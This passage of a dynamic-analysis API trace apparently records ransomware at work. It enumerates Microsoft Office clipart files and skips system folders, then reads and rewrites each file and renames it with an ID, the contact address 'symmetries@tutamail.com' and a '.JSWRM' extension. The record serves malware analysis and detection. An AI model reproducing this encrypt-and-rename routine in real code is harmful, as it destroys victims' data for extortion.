lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0091.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01154_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.677] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5552) returned 1 [0091.677] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15b0) returned 0x205850 [0091.677] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x15b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x15b0, lpOverlapped=0x0) returned 1 [0091.679] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.679] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x15b0, lpOverlapped=0x0) returned 1 [0091.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.679] CloseHandle (hObject=0x314) returned 1 [0091.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0091.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0091.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0091.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0091.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0091.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0091.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.679] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01154_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01154_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0091.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0091.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0091.680] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1858, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01157_.WMF", cAlternateFileName="")) returned 1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2=".") returned 1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="..") returned 1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="...") returned 1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="windows") returned -1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="recovery") returned -1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="perflogs") returned -1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="documents and settings") returned 1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="system volume information") returned -1 [0091.680] lstrcmpiW (lpString1="NA01157_.WMF", lpString2="msocache") returned 1 [0091.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0091.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01157_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01157_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01157_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0091.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01157_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01157_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01157_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0091.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0091.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.681] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6232) returned 1 [0091.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1850) returned 0x205850 [0091.681] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1850, lpOverlapped=0x0) returned 1 [0091.683] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.683] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1850, lpOverlapped=0x0) returned 1 [0091.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.683] CloseHandle (hObject=0x314) returned 1 [0091.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0091.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0091.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0091.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0091.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0091.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.684] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01157_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01157_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0091.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0091.685] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01158_.WMF", cAlternateFileName="")) returned 1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2=".") returned 1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="..") returned 1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="...") returned 1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="windows") returned -1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="recovery") returned -1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="perflogs") returned -1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="documents and settings") returned 1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="system volume information") returned -1 [0091.685] lstrcmpiW (lpString1="NA01158_.WMF", lpString2="msocache") returned 1 [0091.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0091.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01158_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01158_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01158_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0091.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0091.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01158_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01158_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01158_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0091.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0091.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0091.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01158_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.748] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7284) returned 1 [0091.748] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c70) returned 0x205850 [0091.748] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c70, lpOverlapped=0x0) returned 1 [0092.058] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.058] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c70, lpOverlapped=0x0) returned 1 [0092.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.058] CloseHandle (hObject=0x314) returned 1 [0092.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0092.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0092.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0092.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0092.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.059] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01158_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01158_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.060] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.060] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1694, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01161_.WMF", cAlternateFileName="")) returned 1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2=".") returned 1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="..") returned 1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="...") returned 1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="windows") returned -1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="recovery") returned -1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="perflogs") returned -1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="documents and settings") returned 1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="system volume information") returned -1 [0092.060] lstrcmpiW (lpString1="NA01161_.WMF", lpString2="msocache") returned 1 [0092.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.060] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01161_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01161_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01161_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01161_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01161_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01161_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0092.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01161_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.063] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5780) returned 1 [0092.063] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1690) returned 0x205850 [0092.063] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1690, lpOverlapped=0x0) returned 1 [0092.065] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.065] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1690, lpOverlapped=0x0) returned 1 [0092.065] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.065] CloseHandle (hObject=0x314) returned 1 [0092.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.065] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.065] MultiByteToWideChar (in: CodePage=0x0, 